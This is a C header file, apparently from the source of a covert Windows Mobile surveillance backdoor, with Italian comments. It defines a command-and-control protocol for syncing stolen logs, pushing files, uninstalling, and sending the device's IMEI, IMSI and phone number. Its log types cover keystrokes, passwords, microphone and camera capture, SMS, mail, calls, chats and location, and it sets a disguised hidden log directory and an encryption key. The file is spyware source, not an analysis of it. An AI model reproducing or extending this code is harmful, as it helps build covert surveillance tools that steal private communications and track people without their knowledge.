#ifndef __Common_h__
#define __Common_h__

#pragma comment(linker, "/nodefaultlib:libc.lib")
#pragma comment(linker, "/nodefaultlib:libcd.lib")

#include <ceconfig.h>
#if defined(WIN32_PLATFORM_PSPC) || defined(WIN32_PLATFORM_WFSP)
#define SHELL_AYGSHELL
#endif

#ifdef _CE_DCOM
#define _ATL_APARTMENT_THREADED
#endif

#include <Windows.h>
#include <commctrl.h>

#ifdef SHELL_AYGSHELL
#include <aygshell.h>
#pragma comment(lib, "aygshell.lib") 
#endif // SHELL_AYGSHELL


// C RunTime Header Files
#include <stdlib.h>
#include <malloc.h>
#include <memory.h>
#include <tchar.h>

#if defined(WIN32_PLATFORM_PSPC) || defined(WIN32_PLATFORM_WFSP)
#ifndef _DEVICE_RESOLUTION_AWARE
#define _DEVICE_RESOLUTION_AWARE
#endif
#endif

#ifdef _DEVICE_RESOLUTION_AWARE
#include "DeviceResolutionAware.h"
#endif

#if _WIN32_WCE < 0x500 && ( defined(WIN32_PLATFORM_PSPC) || defined(WIN32_PLATFORM_WFSP) )
#pragma comment(lib, "ccrtrtti.lib")
#ifdef _X86_	
#if defined(_DEBUG)
#pragma comment(lib, "libcmtx86d.lib")
#else
#pragma comment(lib, "libcmtx86.lib")
#endif
#endif
#endif

#include <altcecrt.h>
#include <list>
#include <map>
#include <vector>
#include <new>
#include <Tlhelp32.h>
#include <projects.h>

using namespace std;

/**
* Define per il debugging
*/
#ifdef _DEBUG
#define DBG_MSG(x) MessageBox(NULL, x, L"DBG_MSG", MB_OK | MB_TOPMOST);
#define DBG_MSG_2(x, y) MessageBox(NULL, x, y, MB_OK | MB_TOPMOST);
#define DBG_ERROR_VAL(x, f) {WCHAR dbgbuf[60]; wsprintf(dbgbuf, L"Error: 0x%08x on function %s", x, f); MessageBox(NULL, dbgbuf, L"Error", MB_OK | MB_TOPMOST);}
#define DBG_PRINT(x) OutputDebugString(x);
#else
#define DBG_MSG(x) ;
#define DBG_MSG_2(x, y) ;
#define DBG_PRINT(x)  ;
#define DBG_ERROR_VAL(x, f) ;
#endif

#define __STR2__(x) #x
#define __STR1__(x) __STR2__(x)
#define __LOC__ __FILE__ "("__STR1__(__LINE__)") : #warning: "

/**
* Estensione per i file di log
*/
#define LOG_EXTENSION L".mob"
#define LOG_PREFIX L"QML"
#define LOG_DIR L"\\$MS313Mobile\\"
/**
 * Lunghezza della chiave di cifratura utilizzata
 */
#define KEY_LEN 128

/**
 * Numero massimo di caratteri che grabbiamo dal titolo di una finestra
 */
#define MAX_TITLE_LEN 512

/**
 * Define per il recording della voce
 */
#define CHANNEL_INPUT 1

/**
* Define comuni
*/
#define PI (3.141592653589793)
#define MAX_ALLOCABLE_MEMORY 1024 * 1024 // 1 Mb (il define dovrebbe essere multiplo di 16)
#define LOG_VERSION_01 (UINT)0x20081028
#define LOG_DELIMITER 0xABADC0DE

/**
* Define per l'accesso concorrente
*/
//#define WAIT_AND_SIGNAL(x)	while(x){ MiniSleep(350); } x = TRUE;
#define WAIT_AND_SIGNAL(x)	if(WaitForSingleObject(x, INFINITE) == WAIT_ABANDONED) MessageBox(NULL, L"ABANDONED", __FUNCTIONW__, MB_OK);
#define WAIT(x)				while(x){ MiniSleep(350); }
//#define UNLOCK(x)			x = FALSE;
#define UNLOCK(x)			if(!ReleaseMutex(x)){ WCHAR bulbasauro[400]; wsprintf(bulbasauro, L"%s\n%s\n%s", __LINE__, __FUNCTIONW__, __FILEW__); MessageBox(NULL, bulbasauro, L"Release Failed", MB_OK); }
#define SAFE_FREE(x) if (x) { free(x); x = NULL; }
#define SAFE_DELETE(x) if (x) { delete[](x); x = NULL; }
#define SPEEX_FREE	{speex_encoder_destroy(state); speex_bits_destroy(&bits);}

/**
* Stato dell'agente
*/
#define AGENT_DISABLED	(UINT)0x1
#define AGENT_ENABLED	(UINT)0x2
#define AGENT_RUNNING	(UINT)0x3
#define AGENT_STOPPED	(UINT)0x4

/**
* Stato dei monitor
*/
#define EVENT_STOPPED	AGENT_STOPPED
#define EVENT_RUNNING	AGENT_RUNNING

/**
* Comandi per i monitor
*/
#define EVENT_STOP	EVENT_STOPPED

/**
* Comandi per l'agente
*/
#define AGENT_STOP	AGENT_STOPPED
#define AGENT_RELOAD	(UINT)0x1

/**
 * Definizioni utilizzate dagli agenti nella scrittura dei log
 */
#define GPS_VERSION		(UINT)0x20081028
#define CELL_VERSION	(UINT)0x20081028

#define TYPE_GPS	(UINT)0x1
#define TYPE_CELL	(UINT)0x2

/**
* Parametri del protocollo (i comandi validi iniziano da 1 in poi)
*/
#define INVALID_COMMAND		(UINT)0x0	// Non usare
#define PROTO_OK			(UINT)0x1	// OK
#define PROTO_NO			(UINT)0x2	// Comando fallito o non e' stato possibile eseguirlo
#define PROTO_BYE			(UINT)0x3	// Chiusura di connessione
#define PROTO_CHALLENGE		(UINT)0x4	// CHALLENGE,16 byte da cifrare
#define PROTO_RESPONSE		(UINT)0x5	// RESPONSE,16 byte cifrati
#define PROTO_SYNC			(UINT)0x6	// Mandami i log
#define PROTO_NEW_CONF		(UINT)0x7	// NEW_CONF,# prendi la nuova conf lunga # bytes
#define PROTO_LOG_NUM		(UINT)0x8	// LOG_NUM,# stanno per arrivare # logs
#define PROTO_LOG			(UINT)0x9	// LOG,# questo log e' lungo # bytes
#define PROTO_UNINSTALL		(UINT)0xa	// Uninstallati
#define PROTO_RESUME		(UINT)0xb	// RESUME,nome,# rimandami il log "nome" a partire dal byte #
#define PROTO_DOWNLOAD		(UINT)0xc	// DOWNLOAD,nome: mandami il file "nome" (in WCHAR, NULL terminato)
#define PROTO_UPLOAD		(UINT)0xd	// UPLOAD,nome,directory,#: uppa il file "nome" lungo # in "directory"
#define PROTO_FILE			(UINT)0xe	// FILE,nome,#: sta per arrivare un file chiamato "nome" lungo # bytes
#define PROTO_ID			(UINT)0xf	// Id univoco della backdoor, embeddato in fase di configurazione
#define PROTO_INSTANCE		(UINT)0x10	// Id univoco che identifica il dispositivo dove gira la backdoor
#define PROTO_USERID		(UINT)0x11	// IMSI,# byte NON paddati del blocco (il blocco inviato e' paddato)
#define PROTO_DEVICEID		(UINT)0x12	// IMEI,# byte NON paddati del blocco (il blocco inviato e' paddato)
#define PROTO_SOURCEID		(UINT)0x13	// #telefono,# byte NON paddati del blocco (il blocco inviato e' paddato)
#define PROTO_VERSION		(UINT)0x14	// #,bytes versione della backdoor (10 byte)
#define PROTO_LOG_END		(UINT)0x15  // La spedizione dei log e' terminata
/**
 * Tipi di log
 */
#define LOGTYPE_UNKNOWN		0xFFFF	// in caso di errore
#define LOGTYPE_FILEOPEN	0x0000
#define LOGTYPE_FILECAPTURE 0x0001	// in realta' e' 0x0000 e si distingue tra LOG e LOGF
#define LOGTYPE_KEYLOG		0x0040
#define LOGTYPE_PRINT		0x0100
#define LOGTYPE_SNAPSHOT	0xB9B9
#define LOGTYPE_UPLOAD		0x000A	// non si trova nei filename
#define LOGTYPE_DOWNLOAD	0x000B	// non si trova nei filename
#define LOGTYPE_CALL		0x0140
#define LOGTYPE_CALL_SKYPE  0x0141
#define LOGTYPE_CALL_GTALK  0x0142
#define LOGTYPE_CALL_YMSG   0x0143
#define LOGTYPE_CALL_MSN    0x0144
#define LOGTYPE_CALL_MOBILE 0x0145
#define LOGTYPE_URL			0x0180
#define LOGTYPE_CLIPBOARD	0xD9D9
#define LOGTYPE_PASSWORD	0xFAFA
#define LOGTYPE_MIC			0xC2C2
#define LOGTYPE_CHAT		0xC6C6
#define LOGTYPE_CAMSHOT		0xE9E9
#define LOGTYPE_ADDRESSBOOK	0x0200
#define LOGTYPE_CALENDAR	0x0201
#define LOGTYPE_TASK		0x0202
#define LOGTYPE_MAIL		0x0210
#define LOGTYPE_SMS			0x0211
#define LOGTYPE_MMS			0x0212
#define LOGTYPE_LOCATION	0x0220
#define LOGTYPE_CALLLIST	0x0230
#define LOGTYPE_DEVICE		0x0240
#define LOG_MAGIC_CALLTYPE  0x26

/**
 * Parametri di ritorno della Send()
 */
#define SEND_OK			(UINT)0x1
#define SEND_RELOAD		(UINT)0x2
#define SEND_UNINSTALL	(UINT)0x3
#define SEND_FAIL		(UINT)0x4

/**
 * Parametri per la coda IPC
 */
#define IPC_PROCESS		(UINT)0x1
#define IPC_HIDE		(UINT)0x2

typedef struct _ConfStruct{
	UINT uConfId;		// Id dell'opzione
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
}ConfStruct, *pConfStruct;

/**
* Definizione delle principali strutture comuni
*/
// WARNING - Non cambiare l'ordine dei primi 4 parametri della struttura
// altrimenti sara' necessario riscrivere il codice di parsing della configurazione.
typedef struct _AgentStruct{
	UINT uAgentId;		// Id dell'agente
	UINT uAgentStatus;	// Running, Stopped
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
	PVOID pFunc;		// Thread start routine
	UINT uCommand;		// Viene utilizzato per comunicare all'agente
}AgentStruct, *pAgentStruct;

// WARNING - Non cambiare l'ordine dei primi 4 parametri della struttura
// altrimenti sara' necessario riscrivere il codice di parsing della configurazione.
typedef struct _EventStruct{
	UINT uEventType;	// Tipo di evento (Timer, sms, call etc...)
	UINT uActionId;		// Id dell'azione da eseguire 
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
	PVOID pFunc;		// Monitor start routine
	UINT uEventStatus;	// Running, Stopped
	UINT uCommand;		// Viene utilizzato per comunicare col monitor
}EventStruct, *pEventStruct;

// WARNING - Non cambiare l'ordine dei primi 3 parametri della struttura
// altrimenti sara' necessario riscrivere il codice di parsing della configurazione.
typedef struct _ActionStruct{
	UINT uActionType;	// Tag che identifica l'azione
	UINT uParamLength;	// Lunghezza della memoria allocata per pParams
	PVOID pParams;		// Puntatore alla lista dei parametri
}ActionStruct, *pActionStruct;

typedef struct _MacroActionStruct{
	UINT uSubActions;		// Numero di strutture ActionStruct presenti
	pActionStruct pActions; // Puntatore ad un array di ActionStruct
	BOOL bTriggered;		// L'azione e' stata triggerata da un evento
}MacroActionStruct, *pMacroActionStruct;

typedef struct _TimerStruct{
	UINT uType;
	UINT Lo_Delay;
	UINT Hi_Delay;
}TimerStruct, *pTimerStruct;

typedef struct _EventConf{
	UINT uNum;		// Numero di eventi
	PVOID pParams;	// Parametri (Lunghezza, ID azione, Parametri / Lunghezza, ID azione, Parametri......)
}EventConf, *pEventConf;

#pragma pack(4)
typedef struct _IpcMsg {
	UINT dwSender;		// ID del mittente	
	UINT dwRecipient;	// ID dell'evento/agente di destinazione
	UINT dwForwarded;	// Viene incrementato di 1 dopo ogni forward
	UINT dwMsgLen;		// Lunghezza del messaggio (NON deve superare i: 4Kb - sizeof(IpcMsg)
	BYTE Msg[1];		// Il messaggio vero e proprio
	BYTE bReserved[3];	// Per il packing
} IpcMsg, *pIpcMsg;
#pragma pack()

typedef struct _DeviceStruct{
	UINT cbSize;
	BOOL bWifiHidingSupported;		// Id dell'azione
	BOOL bWifiAvailable;
	BOOL bWifiActivable;
	BOOL bBTHidingSupported;	// Tipo di azione da eseguire
	BOOL bBTAvailable;
	BOOL bBTActivable;
	BOOL bGpsAvailable;
	BOOL bGpsHidingSupported;
	OSVERSIONINFO OsVersionInfo;
}DeviceStruct, *pDeviceStruct;

typedef struct _GeneralConf{
	list<AgentStruct *> *pAgents;
	list<EventStruct *> *pEvents;
	list<ActionStruct *> *pActions;
	list<ConfStruct *> *pConf;
}GeneralConf, *pGeneralConf;

/**
* Subito dopo la struttura scriviamo il nome del file in WCHAR, la struttura addizionale
* se necessaria e poi i dati di seguito. Non cambiare MAI l'ordine dei primi 2 membri!
* LOG_VERSION di questa struttura: 0.1
*/
// La PRIMA dword e' in chiaro e indica: sizeof(LogStruct) + uDeviceIdLen + uUserIdLen + uSourceIdLen + uAdditionalData
// ed e' paddata a 16 byte poiche' l'header e' cifrato. Tramite questa dword si puo' sapere da dove parte il
// primo byte di dati effettivi.
typedef struct _LogStruct{
	UINT uVersion;			// Versione della struttura
	UINT uLogType;			// Tipo di log
	UINT uHTimestamp;		// Parte alta del timestamp
	UINT uLTimestamp;		// Parte bassa del timestamp
	UINT uDeviceIdLen;		// IMEI/Hostname len
	UINT uUserIdLen;		// IMSI/Username len
	UINT uSourceIdLen;		// Numero del caller/IP len
	UINT uAdditionalData;	// Lunghezza della struttura addizionale, se presente
}LogStruct, *pLogStruct;

/**
 * Struttura utilizzata per il sorting dei log
 */
typedef struct _LogInfo {
	WCHAR *pLog;
	ULARGE_INTEGER date;
} LogInfo, *pLogInfo;

/**
 * Struttura utilizzata dalla superclass UberLog
 */
typedef struct _UberStruct {
	WCHAR *wLogName;
	UINT uLogType;
	UINT uLogSeq;
	FILETIME ft;
	BOOL bOnMmc;
	BOOL bInUse;
} UberStruct, *pUberStruct;

/**
* Qui definiamo tutti gli extern delle variabili globali necessarie
* al funzionamento della backdoor. Le definizioni si trovano in Common.cpp
*/
extern DWORD		g_Version;
extern BYTE			g_AesKey[];
extern BYTE			g_InstanceId[];
extern BYTE			g_BackdoorID[];
extern BYTE			g_Challenge[];
extern WCHAR		g_ConfName[];
extern HANDLE		g_hSmsQueueRead, g_hSmsQueueWrite;

// HINSTANCE del modulo
static HINSTANCE g_hInstance;

/**
* Definizione delle funzioni helper comuni
*/
#define LOOP for(;;)
#define HEX(c)  ((c) <= '9' ? (c) - '0' : (c) <= 'F' ? (c) - 'A' + 0xA : (c) - 'a' + 0xA)

void MiniSleep(UINT uMilliSec);
void MiniSleepEx(UINT uMilliSec, UINT Type);
WCHAR* GetCurrentPath(WCHAR *pInFile);
WCHAR* GetMMCPath(WCHAR *pInFile);
UINT WideLen(const WCHAR *p);
unsigned __int64 GetTime();
unsigned __int64 DiffTime(unsigned __int64 new_time, unsigned __int64 old_time);
#endif